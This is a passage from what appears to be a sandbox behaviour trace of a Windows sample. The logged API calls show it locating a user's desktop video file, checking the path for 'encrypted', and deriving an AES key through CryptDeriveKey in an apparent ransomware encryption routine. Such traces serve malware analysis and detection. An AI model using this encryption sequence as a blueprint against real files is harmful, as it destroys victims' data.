ftCreationTime.dwLowDateTime=0xe7827100, ftCreationTime.dwHighDateTime=0x1d5b6e1, ftLastAccessTime.dwLowDateTime=0x6e9dfc40, ftLastAccessTime.dwHighDateTime=0x1d5b999, ftLastWriteTime.dwLowDateTime=0x6e9dfc40, ftLastWriteTime.dwHighDateTime=0x1d5b999, nFileSizeHigh=0x0, nFileSizeLow=0xf8a1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="hnSU4W.mkv", cAlternateFileName="")) returned 0x7c20c0 [0029.942] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.942] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7827100, ftCreationTime.dwHighDateTime=0x1d5b6e1, ftLastAccessTime.dwLowDateTime=0x6e9dfc40, ftLastAccessTime.dwHighDateTime=0x1d5b999, ftLastWriteTime.dwLowDateTime=0x6e9dfc40, ftLastWriteTime.dwHighDateTime=0x1d5b999, nFileSizeHigh=0x0, nFileSizeLow=0xf8a1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="hnSU4W.mkv", cAlternateFileName="")) returned 0x7c20c0 [0029.943] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.943] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nSU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SU4W.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.944] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.944] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0029.944] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.944] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.945] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.945] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.945] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.945] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.945] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.945] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hnSU4W.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7827100, ftCreationTime.dwHighDateTime=0x1d5b6e1, ftLastAccessTime.dwLowDateTime=0x6e9dfc40, ftLastAccessTime.dwHighDateTime=0x1d5b999, ftLastWriteTime.dwLowDateTime=0x6e9dfc40, ftLastWriteTime.dwHighDateTime=0x1d5b999, nFileSizeHigh=0x0, nFileSizeLow=0xf8a1, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="hnSU4W.mkv", cAlternateFileName="")) returned 0x7c2100 [0029.945] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.945] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.945] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.945] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.945] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.945] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.945] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.945] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0029.945] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.945] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.946] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0029.946] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.946] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.946] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.946] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.946] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.946] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0029.946] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.946] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0029.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.947] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0029.947] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.947] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.947] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.947] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0029.947] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.947] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.947] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.947] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.948] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.948] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.948] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.948] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.948] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.948] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.948] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.948] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.948] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.948] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.948] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.948] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0029.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.949] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0029.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.949] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.949] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0029.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.949] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.949] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.949] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.949] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0029.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0029.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.950] RtlAllocateHeap 